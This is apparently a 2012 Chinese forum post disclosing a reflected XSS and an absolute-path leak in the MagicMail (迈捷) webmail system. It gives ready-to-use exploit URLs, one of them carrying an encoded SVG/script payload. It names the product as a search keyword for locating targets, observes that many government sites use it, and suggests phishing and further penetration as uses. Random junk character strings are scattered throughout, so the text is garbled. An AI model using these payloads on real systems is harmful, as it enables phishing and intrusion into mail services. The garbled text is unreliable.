今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞! g3 M; J }9 k& r
; D5 V! M3 p3 k: _% X, I7 ?# } - }; R8 C3 }0 v" s' B
包含 一个反射性XSS 以及 绝对路径泄漏
; L! z( x1 S% ?1 q看了看 貌似全部是linux的。
) F4 [6 W7 v' m: q2 i& r) Q. o
% l7 F2 Y$ q3 O) u7 ~- R8 B关键字:迈捷邮件系统 by MagicMail
9 s) @7 p5 u6 P1 h' C
4 |; O4 _* ~6 \# v9 E! a8 [可以看到很多政府网站都用这个邮件系统* G, ]0 v# i0 L- B' Y& f! U7 `: o
4 v6 {" d. f" E; u- @" o' B( G
绝对路径 http://madman.in/index.php?login_type=declare&language=
# F3 \ C# U( f7 v$ A% T, Z! B! _: s8 L; u" ^
: B8 e$ y1 O/ V, Q1 [6 J' Y) G `; d& h, S
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E" l, ^! W) h- [3 W
- l. g) B& H' Q& A8 M
6 n4 ^/ b. ]9 A: z0 T2 q, r! ]& F* R3 m3 w4 P0 T4 M
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等9 n+ K5 }3 a( Q
! I" A8 }; r7 e( e# J2 J2 L" A
修复方案:看官方补丁吧。
% z5 x( X5 G, U0 d3 Z |
发表于 2012-11-9 20:38:41
收藏
支持
反对